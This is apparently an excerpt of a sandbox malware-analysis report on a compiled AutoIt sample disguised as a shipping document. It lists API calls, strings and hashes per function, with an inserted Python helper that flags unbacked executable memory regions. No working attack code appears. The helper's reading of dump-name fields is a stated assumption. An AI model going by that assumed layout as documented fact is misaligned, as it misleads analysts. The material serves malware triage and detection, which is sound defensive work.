                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 8641f341da8f82053dc25762242d8107a93377b3e8c8392badabd0c8201cae60
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 99C186322151B309EF2D4639953413EBFA15FA27B631A27ADE4B2EB1D4EF10C664D620
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 771f4d624d6ec0887daa0f365929d938e7a273c86c9e9259c3505b5f4b507b12
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: F9C1643620516349EB2D4639A53413EFAA15EB27B631A27EDE4B3EB1C4EF10C624D610
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction ID: df8bbdcf0dde6b2834821f8431a5b17a078f1061c42e52e3e4bc3c868a913a9c
                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction Fuzzy Hash: EB41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction ID: 48469681b11aa8b0118f13314fce1e7597b1c629b015d903811ae251e75d5194
                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction Fuzzy Hash: 91019278E01109EFCB54DF99C5909AEF7B5FB88310F208699E809A7705D730AE41EB81
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction ID: 955479657bb67d7db8fa08c5da43cf74aa3ab1aa137fb5086d4e22e403fdea6a
                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction Fuzzy Hash: D8019278E01109EFCB44DF99C5909AEF7B5FB48310F208599E809A7301D730EE41EB81
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
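The entries above come from two different memory dumps: most were lifted from the image mapped at 00E00000 (based on PE: true), while the last four come from a region at 00FE7000 whose dump is not PE-backed. The script below is an added triage helper, not part of this Joe Sandbox report or of Joe Sandbox itself. It parses entries in this listing format, groups them by dump, decodes the protection and region-type fields of the dump file name using the winnt.h constants (PAGE_EXECUTE_READWRITE = 0x40, MEM_PRIVATE = 0x20000), and flags regions that are private, executable-writable memory with no PE image behind them, which is where an unpacked or injected payload stage usually sits. The position of those fields inside the .sdmp name is an assumption, not something this page documents. It also collects the strings seen per region, which is where the "AutoIt v3" and "#include" markers that support the compiled-AutoIt classification show up. The sample input is a constructed excerpt copied from the entries on this page.

```python
"""Triage helper for per-function entries of a Joe Sandbox report (added example).

Groups function entries by the memory dump they were lifted from and flags dumps
that are not PE-backed and live in private RWX memory. ASSUMED .sdmp name layout
(not documented on the report page):
<pid>.<kind>.<timestamp>.<base>.<protect>.<field6>.<type>.<module>.sdmp
"""
import re
from collections import Counter, defaultdict

# Memory constants from winnt.h.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
# Strings the report shows for the AutoIt runtime (taken from the entries on this page).
AUTOIT_MARKERS = {"AutoIt v3", "#include", "#requireadmin", "#OnAutoItStartRegister"}

HEX8 = r"[0-9A-Fa-f]{8}"
SDMP_RE = re.compile(
    rf"(?P<pid>{HEX8})\.(?P<kind>{HEX8})\.(?P<ts>\d+)\.(?P<base>[0-9A-Fa-f]{{16}})\."
    rf"(?P<protect>{HEX8})\.(?P<f6>{HEX8})\.(?P<type>{HEX8})\.(?P<mod>{HEX8})\.sdmp"
)
SOURCE_RE = re.compile(r"^•\s+Source File:\s+(?P<name>\S+\.sdmp), Offset: [0-9A-Fa-f]+, based on PE: (?P<pe>true|false)$")
# "• Api.MODULE(args), ref: 00E42171" or "• Api.MODULE ref: 00E77990"
API_RE = re.compile(r"^•\s+(?P<api>\w+)\.(?P<mod>\w+)(?:\(.*\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]{8})$")

# Constructed excerpt of the report entries above (three functions, two dumps).
SAMPLE = """\
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00E42171
Memory Dump Source
• Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• API ID: NameUser
• String ID:
• Instruction Fuzzy Hash: C8C048F1801109DFCB05DBA1EA88DEEB7BCAB08304F2040A6E106F2100D7749B889B72
Memory Dump Source
• Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
• API ID:
• String ID:
• Instruction Fuzzy Hash: EB41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
APIs
• DestroyWindow.USER32 ref: 00E77990
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77B4A
Memory Dump Source
• Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
• String ID: $AutoIt v3$DISPLAY$static
• Instruction Fuzzy Hash: 16027D71900105EFDB14DFA5CC89EAEBBB9EF48310F108169F959BB2A1DB30AD45CB60
"""

def _new_entry():
    return {"apis": [], "strings": [], "source": None, "based_on_pe": None, "fuzzy": None}

def parse_sdmp_name(name):
    """Decode base address, protection and region type from a dump file name."""
    m = SDMP_RE.fullmatch(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    return {"base": int(m["base"], 16), "protect": int(m["protect"], 16), "type": int(m["type"], 16)}

def parse_entries(text):
    """One dict per function entry; an entry closes at its Instruction Fuzzy Hash line."""
    entries, cur = [], _new_entry()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("• Part of subcall"):
            continue  # callee APIs, not this function's own
        if m := API_RE.match(line):
            cur["apis"].append((m["api"], m["mod"], int(m["ref"], 16)))
        elif m := SOURCE_RE.match(line):
            cur["source"] = parse_sdmp_name(m["name"])
            cur["based_on_pe"] = m["pe"] == "true"
        elif line.startswith("• String ID:"):
            cur["strings"] = [s for s in line.split(":", 1)[1].split("$") if s.strip()]
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur["fuzzy"] = line.split(":", 1)[1].strip()
            entries.append(cur)
            cur = _new_entry()
    return entries

def is_unbacked_rwx(entry):
    """Code lifted from private RWX memory that no PE image accounts for."""
    src = entry["source"]
    return bool(src and not entry["based_on_pe"]
                and src["protect"] & PAGE_EXECUTE_READWRITE and src["type"] == MEM_PRIVATE)

def regions(entries):
    """Per dump base: function count, API histogram, strings seen, RWX flag."""
    out = defaultdict(lambda: {"functions": 0, "apis": Counter(), "strings": set(), "unbacked_rwx": False})
    for e in entries:
        r = out[e["source"]["base"]]
        r["functions"] += 1
        r["apis"].update(api for api, _, _ in e["apis"])
        r["strings"].update(e["strings"])
        r["unbacked_rwx"] = r["unbacked_rwx"] or is_unbacked_rwx(e)
    return dict(out)

def autoit_markers(region):
    """AutoIt runtime strings seen in a region, evidence for the compiled-AutoIt verdict."""
    return sorted(AUTOIT_MARKERS & region["strings"])

if __name__ == "__main__":
    for base, r in sorted(regions(parse_entries(SAMPLE)).items()):
        kind = "UNBACKED RWX" if r["unbacked_rwx"] else "image"
        print(f"{base:#010x} {kind:12} funcs={r['functions']} autoit={autoit_markers(r)} apis={sorted(r['apis'])}")
```

Run against the full listing, the image region at 00E00000 accumulates the GDI and window-management calls and the AutoIt strings, which is the interpreter's own code, while the 00FE7000 region is the one worth carving out and examining separately. "Part of subcall function" lines are skipped on purpose so callee APIs are not double-counted against the caller.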
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 00E77970
                    • DeleteObject.GDI32(00000000), ref: 00E77982
                    • DestroyWindow.USER32 ref: 00E77990
                    • GetDesktopWindow.USER32 ref: 00E779AA
                    • GetWindowRect.USER32(00000000), ref: 00E779B1
                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00E77AF2
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00E77B02
                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77B4A
                    • GetClientRect.USER32(00000000,?), ref: 00E77B56
                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E77B90
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BB2
                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BC5
                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BD0
                    • GlobalLock.KERNEL32(00000000), ref: 00E77BD9
                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BE8
                    • GlobalUnlock.KERNEL32(00000000), ref: 00E77BF1
                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77BF8
                    • GlobalFree.KERNEL32(00000000), ref: 00E77C03
                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77C15
                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00E92CAC,00000000), ref: 00E77C2B
                    • GlobalFree.KERNEL32(00000000), ref: 00E77C3B
                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00E77C61
                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00E77C80
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77CA2
                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77E8F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                    • String ID: $AutoIt v3$DISPLAY$static
                    • API String ID: 2211948467-2373415609
                    • Opcode ID: 3399bc55929403ef78185b64b1a56e2029dba25312dd0fad5bfc44a99be50126
                    • Instruction ID: 05179fcfeb5a7299d46d47950f2b637feafc1b9486d6c73a5c75ab9b7746c3dc
                    • Opcode Fuzzy Hash: 3399bc55929403ef78185b64b1a56e2029dba25312dd0fad5bfc44a99be50126
                    • Instruction Fuzzy Hash: 16027D71900105EFDB14DFA5CC89EAEBBB9EF48310F108169F959BB2A1DB30AD45CB60
                    APIs
                    • CharUpperBuffW.USER32(?,?,00E8F910), ref: 00E83690
                    • IsWindowVisible.USER32(?), ref: 00E836B4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: 4a87bcdfc0e21798d9d43883aecf31d16a126477e64202e07ee679e807dac1a1
                    • Instruction ID: 8d96868081f19079e3498dfbbc9ff0ce749f77170cc13ebc0e13ebcf71cbdf4d
                    • Opcode Fuzzy Hash: 4a87bcdfc0e21798d9d43883aecf31d16a126477e64202e07ee679e807dac1a1
                    • Instruction Fuzzy Hash: E0D192702042119BCB14FF24C492AAAB7E5AF95744F146958F88E7B3E3DB31DE4ACB41
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 00E8A662
                    • GetSysColorBrush.USER32(0000000F), ref: 00E8A693
                    • GetSysColor.USER32(0000000F), ref: 00E8A69F
                    • SetBkColor.GDI32(?,000000FF), ref: 00E8A6B9
                    • SelectObject.GDI32(?,00000000), ref: 00E8A6C8
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A6F3
                    • GetSysColor.USER32(00000010), ref: 00E8A6FB
                    • CreateSolidBrush.GDI32(00000000), ref: 00E8A702
                    • FrameRect.USER32(?,?,00000000), ref: 00E8A711
                    • DeleteObject.GDI32(00000000), ref: 00E8A718
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00E8A763
                    • FillRect.USER32(?,?,00000000), ref: 00E8A795
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E8A7C0
                      • Part of subcall function 00E8A8FC: GetSysColor.USER32(00000012), ref: 00E8A935
                      • Part of subcall function 00E8A8FC: SetTextColor.GDI32(?,?), ref: 00E8A939
                      • Part of subcall function 00E8A8FC: GetSysColorBrush.USER32(0000000F), ref: 00E8A94F
                      • Part of subcall function 00E8A8FC: GetSysColor.USER32(0000000F), ref: 00E8A95A
                      • Part of subcall function 00E8A8FC: GetSysColor.USER32(00000011), ref: 00E8A977
                      • Part of subcall function 00E8A8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A985
                      • Part of subcall function 00E8A8FC: SelectObject.GDI32(?,00000000), ref: 00E8A996
                      • Part of subcall function 00E8A8FC: SetBkColor.GDI32(?,00000000), ref: 00E8A99F
                      • Part of subcall function 00E8A8FC: SelectObject.GDI32(?,?), ref: 00E8A9AC
                      • Part of subcall function 00E8A8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A9CB
                      • Part of subcall function 00E8A8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9E2
                      • Part of subcall function 00E8A8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9F7
                      • Part of subcall function 00E8A8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8AA1F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                    • String ID:
                    • API String ID: 3521893082-0
                    • Opcode ID: d75ea2258fe8fe0aa4cf49c2e3956e0bc91614427172033540772b59b951036d
                    • Instruction ID: a07fc10d971d0ef22905aff0c6ead338264e4e4ca838870d8ac7de6083f4f730
                    • Opcode Fuzzy Hash: d75ea2258fe8fe0aa4cf49c2e3956e0bc91614427172033540772b59b951036d
                    • Instruction Fuzzy Hash: 88919F72008301EFDB10AF65DC08E5B7BA9FF88321F141B2AF56AB61A1D731D848DB52
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00E02CA2
                    • DeleteObject.GDI32(00000000), ref: 00E02CE8
                    • DeleteObject.GDI32(00000000), ref: 00E02CF3
                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00E02CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00E02D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E3C5BB
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E3C5F4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E3CA1D
                      • Part of subcall function 00E01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02036,?,00000000,?,?,?,?,00E016CB,00000000,?), ref: 00E01B9A
                    • SendMessageW.USER32(?,00001053), ref: 00E3CA5A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E3CA71
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E3CA87
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E3CA92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: 075c6d6a4236b155e1ed6fc4fee57ec47ba863c7c5cbace1f14f3024002f5e8f
                    • Instruction ID: 02c48be87f6d9ca679a2b6fedd0b1463bba4a87e96064b39222aa71f91640858
                    • Opcode Fuzzy Hash: 075c6d6a4236b155e1ed6fc4fee57ec47ba863c7c5cbace1f14f3024002f5e8f
                    • Instruction Fuzzy Hash: 79127031600201EFDB15CF24C88CBA9BBE5BF45308F646569E999FB2A2C731EC85DB51
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 00E775F3
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E776B2
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E776F0
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E77702
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E77748
                    • GetClientRect.USER32(00000000,?), ref: 00E77754
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E77798
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E777A7
                    • GetStockObject.GDI32(00000011), ref: 00E777B7
                    • SelectObject.GDI32(00000000,00000000), ref: 00E777BB
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E777CB
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E777D4
                    • DeleteDC.GDI32(00000000), ref: 00E777DD
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E77809
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E77820
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E7785B
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E7786F
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E77880
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E778B0
                    • GetStockObject.GDI32(00000011), ref: 00E778BB
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E778C6
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E778D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: a3de261487a2dccd3c9893609f1ad5b8b04e1f1a55d7e3bb0c1c7143a8eb7a1a
                    • Instruction ID: 4946e5272a622b90f8961e63d3238b95375ca3d7a1f079e01496e1a9e9a63747
                    • Opcode Fuzzy Hash: a3de261487a2dccd3c9893609f1ad5b8b04e1f1a55d7e3bb0c1c7143a8eb7a1a
                    • Instruction Fuzzy Hash: 59A17F71A40605BFEB149BA5DC4AFAE7BB9EB44710F008124FA19B72E1C771AD45CB60
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00E6ADAA
                    • GetDriveTypeW.KERNEL32(?,00E8FAC0,?,\\.\,00E8F910), ref: 00E6AE87
                    • SetErrorMode.KERNEL32(00000000,00E8FAC0,?,\\.\,00E8F910), ref: 00E6AFE5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: f163bab04ac6c588e8f831e83539345fade197315a278abf8fc0a0b1a842d694
                    • Instruction ID: 69ba88c7a3bcd1e993a13c93478aa1a3b13446759c6f4a1c7a8110c169d0727d
                    • Opcode Fuzzy Hash: f163bab04ac6c588e8f831e83539345fade197315a278abf8fc0a0b1a842d694
                    • Instruction Fuzzy Hash: 5B5183B4B843059ACB04EB20EAD28FAB3B4AB543847287476E906B7291CF319D41DF53
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: 4aa4c992842c4015ee7132de4535c55f8f2cb5d9705e9e0533c40888dde1f549
                    • Instruction ID: b1e2f572289561cadd3521e53c51dfe849cd421a001d1d7b39cd76a407064d4b
                    • Opcode Fuzzy Hash: 4aa4c992842c4015ee7132de4535c55f8f2cb5d9705e9e0533c40888dde1f549
                    • Instruction Fuzzy Hash: 20810871740316BACB20BF60DC87FEE77A8AF15704F047025F945BA1D6EB60DA91CA91
                    APIs
                    • GetSysColor.USER32(00000012), ref: 00E8A935
                    • SetTextColor.GDI32(?,?), ref: 00E8A939
